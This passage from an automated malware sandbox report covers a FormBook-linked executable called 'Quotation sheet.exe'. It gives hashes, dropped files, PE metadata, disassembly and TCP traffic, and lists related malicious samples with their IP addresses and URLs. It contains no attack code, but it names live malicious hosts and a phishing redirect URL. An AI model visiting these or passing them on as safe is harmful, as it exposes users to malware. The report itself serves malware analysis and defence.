                                                                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 208.91.197.27

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      LINKNET-ID-APLinknetASNIDla.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 139.37.190.35
                                                                                                                      apep.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 139.41.51.197
                                                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 103.21.221.4
                                                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 103.21.221.87
                                                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 103.21.221.87
                                                                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                      • 139.41.28.196
                                                                                                                      mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                      • 139.8.67.219
                                                                                                                      sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                      • 139.68.174.175
                                                                                                                      PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 103.21.221.87
                                                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 103.21.221.87
                                                                                                                      CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfbot.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                      • 8.211.161.8
                                                                                                                      https://newbuck12.oss-ap-southeast-7.aliyuncs.com/pJKrbGSI.txtGet hashmaliciousUnknownBrowse
                                                                                                                      • 8.213.160.91
                                                                                                                      la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 147.139.14.185
                                                                                                                      ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 8.210.46.21
                                                                                                                      apep.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 47.242.96.182
                                                                                                                      apep.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 47.90.113.185
                                                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 8.210.46.21
                                                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 8.210.46.21
                                                                                                                      x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                      • 47.253.2.162
                                                                                                                      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                      • 8.215.199.92
                                                                                                                      PLANETHOSTER-8CAPurchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 146.88.233.115
                                                                                                                      PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 146.88.233.115
                                                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 146.88.233.115
                                                                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 146.88.233.115
                                                                                                                      https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                                                                                      • 146.88.234.239
                                                                                                                      EVCPUSBND147124_MBL Check_revised.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                      • 199.16.129.175
                                                                                                                      Yb6ztdvQaB.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 85.236.153.44
                                                                                                                      Remittance advice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                      • 199.16.129.175
                                                                                                                      https://serwer2464839.home.pl/imodzeb4Get hashmaliciousUnknownBrowse
                                                                                                                      • 146.88.233.222
                                                                                                                      3Lf408k9mg.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                                                                                      • 146.88.232.72

                                                                                                                      JA3 Fingerprints

                                                                                                                      No context

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation sheet.exe.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\Quotation sheet.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1216
                                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                                                                      MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                                                                      SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                                                                      SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                                                                      SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                                                                      Malicious:true
                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1172
                                                                                                                      Entropy (8bit):5.342253675595303
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:3TWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:jWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                                                                      MD5:65F39D0C067BD94798C0B18D69D25CC5
                                                                                                                      SHA1:C57AD5B4549322FC52F9975BB30CF5913F66592A
                                                                                                                      SHA-256:37A0B1D9D3308943E05997F9E8783652A36CDE5617E7B2309E2E324944D5937B
                                                                                                                      SHA-512:0C851CE128FA12EAE9A737F6FBEE34FB2790F46A84E525B05C84251972F04A94F2AFE97F244DD7C4691E3A844CC04EE1119D39CF5C33B645ECE5BC8022BF4C5A
                                                                                                                      Malicious:false
                                                                                                                      Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                      C:\Users\user\AppData\Local\Temp\72Z53078

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\pcaui.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):196608
                                                                                                                      Entropy (8bit):1.1239949490932863
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjko1olp.jns.ps1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lt5xj1k3.zxg.psm1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqpup5vg.4ql.ps1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yacoaawm.4z1.psm1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Entropy (8bit):7.721271044960644
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                      File name:Quotation sheet.exe
                                                                                                                      File size:795'136 bytes
                                                                                                                      MD5:44ae4c9c2ab6623c0c1d04bb8b81871e
                                                                                                                      SHA1:efdd834862890028d1b52e2076ff5f78c84754c5
                                                                                                                      SHA256:122baa2b0520a7dd37025a89bccf9fcaf87f99519bfc0ec84a4a48cddb6f9b6d
                                                                                                                      SHA512:13c156d9ad7156b918207848a79e1419e96c53a65c0aab04f6aa572395c5a148805d9e90439e9b4095667361467560cd23e0f875950433003cbc7aba23f8700e
                                                                                                                      SSDEEP:12288:lnCb+eCSmxbeTHBVQAZQ+rX61yukWpGxFO9IbJoQ5GfHZPXjK/9I3j/VzrRZPCoT:luCUVn9X6HhuJoQ5QZPXu9Iz/VHRZKo
                                                                                                                      TLSH:A305F1403756C702E5864BB00861E3B427B92E9EF521C31B8BF9ADFF7835719A199387
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$sEg..............0..............5... ...@....@.. ....................................@................................

                                                                                                                      File Icon

                                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x4c352e
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x67457324 [Tue Nov 26 07:05:08 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc34dc0x4f.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x62c.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xc60000xc.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xc152c0x54.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x20000xc15340xc1600c2ab957c72e4ed6971a2a61c722da36bFalse0.8919291875404007data7.730235064385923IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0xc40000x62c0x8003a7567c8fc7174012ba25a20107e836fFalse0.33984375data3.4798322112610487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0xc60000xc0x200596fe3cc357f31f1b04f03217c96e393False0.044921875data0.09409792566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_VERSION0xc40900x39cdata0.42207792207792205
                                                                                                                      RT_MANIFEST0xc443c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                      Network Behavior

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Nov 26, 2024 11:17:19.263714075 CET4980580192.168.2.6103.21.221.87
                                                                                                                      Nov 26, 2024 11:17:19.383790970 CET8049805103.21.221.87192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:19.384694099 CET4980580192.168.2.6103.21.221.87
                                                                                                                      Nov 26, 2024 11:17:19.394519091 CET4980580192.168.2.6103.21.221.87
                                                                                                                      Nov 26, 2024 11:17:19.514519930 CET8049805103.21.221.87192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:21.031378984 CET8049805103.21.221.87192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:21.031503916 CET8049805103.21.221.87192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:21.031594992 CET4980580192.168.2.6103.21.221.87
                                                                                                                      Nov 26, 2024 11:17:21.034773111 CET4980580192.168.2.6103.21.221.87
                                                                                                                      Nov 26, 2024 11:17:21.154659033 CET8049805103.21.221.87192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:36.763113022 CET4984580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:36.886116982 CET804984538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:36.886193037 CET4984580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:36.905915022 CET4984580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:37.027040005 CET804984538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:38.414474964 CET4984580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:38.476531029 CET804984538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:38.476547003 CET804984538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:38.476644039 CET4984580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:38.476664066 CET4984580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:38.535080910 CET804984538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:38.535753965 CET4984580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:39.434300900 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:39.554419041 CET804985238.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:39.554579973 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:39.575300932 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:39.695374966 CET804985238.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:41.086462021 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:41.243105888 CET804985238.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:41.243119001 CET804985238.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:41.243127108 CET804985238.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:41.243210077 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:41.243242979 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:41.243242979 CET4985280192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:42.105149984 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:42.225706100 CET804985838.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:42.225966930 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:42.246438980 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:42.368531942 CET804985838.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:42.368556976 CET804985838.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:43.758385897 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:43.760225058 CET804985838.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:43.760305882 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:43.760322094 CET804985838.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:43.760369062 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:43.879576921 CET804985838.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:43.879666090 CET4985880192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:44.784531116 CET4986580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:44.904476881 CET804986538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:44.904687881 CET4986580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:44.913440943 CET4986580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:45.035063028 CET804986538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:46.448482037 CET804986538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:46.448595047 CET804986538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:46.448657990 CET4986580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:46.451270103 CET4986580192.168.2.638.47.232.124
                                                                                                                      Nov 26, 2024 11:17:46.571949005 CET804986538.47.232.124192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:52.250286102 CET4988180192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:52.370229006 CET8049881199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:52.370313883 CET4988180192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:52.384960890 CET4988180192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:52.505899906 CET8049881199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:53.559665918 CET8049881199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:53.559916019 CET8049881199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:53.559928894 CET8049881199.59.243.227192.168.2.6
                                                                                                                      Nov 26, 2024 11:17:53.559966087 CET4988180192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:53.559999943 CET4988180192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:53.902254105 CET4988180192.168.2.6199.59.243.227
                                                                                                                      Nov 26, 2024 11:17:54.917499065 CET4989280192.168.2.6199.59.243.227
